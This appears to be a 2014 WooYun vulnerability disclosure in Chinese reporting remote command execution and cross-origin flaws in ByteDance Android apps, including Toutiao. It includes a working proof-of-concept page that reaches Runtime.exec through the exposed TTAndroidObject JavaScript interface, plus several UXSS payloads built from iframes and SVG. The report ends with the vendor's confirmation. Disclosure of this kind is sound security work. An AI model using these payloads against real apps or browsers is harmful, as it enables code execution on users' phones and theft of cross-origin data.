当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074778

漏洞标题:字节跳动旗下N多产品安卓客户端远程代码执、 跨域漏洞等

相关厂商:字节跳动

漏洞作者: DuFanG

提交时间:2014-09-02 15:54

修复时间:2014-12-01 15:56

公开时间:2014-12-01 15:56

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-02: 细节已通知厂商并且等待厂商处理中
2014-09-05: 厂商已经确认,细节仅向厂商公开
2014-09-08: 细节向第三方安全合作伙伴开放
2014-10-30: 细节向核心白帽子及相关领域专家公开
2014-11-09: 细节向普通白帽子公开
2014-11-19: 细节向实习白帽子公开
2014-12-01: 细节向公众公开

简要描述:

听说会有礼物~~~我就来了~~~礼物~、、、

详细说明:

漏洞一 命令执行
之前有人提交一次你们命令执行可是在这次升级中你们又忽略了检测, 结果导致又出现该漏洞。
详情亲看 http://wooyun.org/bugs/wooyun-2010-061543
这次测试的是3.6.0版本

46F9A54C68C82FFC7B7DD40A6C3AB5C7.jpg


如图

133F0DDA0D9D6E263623524BB6DE809F.jpg


5BA22B75458C9BB9C39A0F2FCAC23805.jpg


如上图所示存在漏洞接口为 ; TTAndroidObject
构造POC如下(感谢mango提供代码):

<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
if(window.TTAndroidObject){
    try{
        TTAndroidObject.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec (["/system/bin/sh","-c","echo 'test' > /storage/emulated/0/1.txt"]);
        alert('good job');
    }catch(e){
        alert(e);
    }
}
</script>
<title>app test</title>
</body>
</html>


成功执行命令会在目录下生成1.txt 路径的话因为我的是红米你可以自己改。
漏洞二: 各种跨域漏洞(只拿今日头条测试,你们的今日娱乐APP也存在)

<iframe name="m" src="http://zone.wooyun.org" onload="window.open('\u0000javascript:alert(document.domain)','m')" >


含有上面代码内容打开网页就会跨域

2C08AE617897D3F8013D737DAC1D2A59.jpg


<body>
<script>
i = document.body.appendChild(document.createElement("iframe"));
i.src = "http://www.sogou.com";
i.onload = function()
{
document.documentURI = "javascript://hostname.com/%0D%0Aalert('OH HAI ' + location)";
i.contentWindow.location = "";
}
</script>
</body>


这个也是如此~~~

506A4607B983D28D15B3210140A3A23A.jpg


test.html代码:
<head>
<script>
main = function()
{
    specialFrame = document.body.appendChild(document.createElement("iframe"));
    document.adoptNode(specialFrame);
    document.implementation.createHTMLDocument().adoptNode(specialFrame);
    specialFrame.contentWindow.location = "http://www.baidu.com/";
    interval1 = setInterval(function() {
        if (specialFrame.contentDocument)
            return;
        clearInterval(interval1);
        specialFrame.src = "javascript:alert(document.body.innerHTML)";
        uxssFrame = document.body.appendChild(document.createElement("iframe"));
        uxssFrame.src = "test.svg";
    }, 100);
}
</script>
</head>
<body onload="main()"></body>
svg代码:
<svg xmlns="http://www.w3.org/2000/svg">
<script>
svg = document.documentElement;
frame = svg.appendChild(document.createElementNS("http://www.w3.org/1999/xhtml", "iframe"));
frame.contentWindow.onunload = function() {
    svg.appendChild(top.specialFrame);
}
</script> 
<element param="1" param="2"/>
</svg>


两个代码~~~ 可直接跨域。

1E8DC7DDDE06DD34853D60E106A20F1E.jpg

漏洞证明:

友情提示一下哦~
贵公司的内涵段子 内涵社区 的安卓客户端都存在命令执行漏洞且漏洞接口为:TTAndroidObject 下图为证

63EBC22BE57F445EF359266A305763C6.jpg


A0475BFCA3E02671BD4BEA89E5C51110.jpg


CDB86535017046F0ABD96229DCC88210.jpg


贵公司的今日头彩APP 存在命令执行漏洞且漏洞接口为:baseWebView 请看下图

1AC18DA2E7910F86020D8FBDE510AFBC.jpg

修复方案:

安全这个东西很重要~~希望贵公司尽快修复~ 而且要周期性的检查一遍哦~~~ 最后求礼物~~~

版权声明:转载请注明来源 DuFanG@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-09-05 17:56

厂商回复:

某手机厂商的系统版本中,该接口漏洞理应已经修复,但实际未修复。字节跳动旗下产品在下一轮版本更新中会对该厂商的系统做对应处理。同时会通知该厂商修复该漏洞。

最新状态:

暂无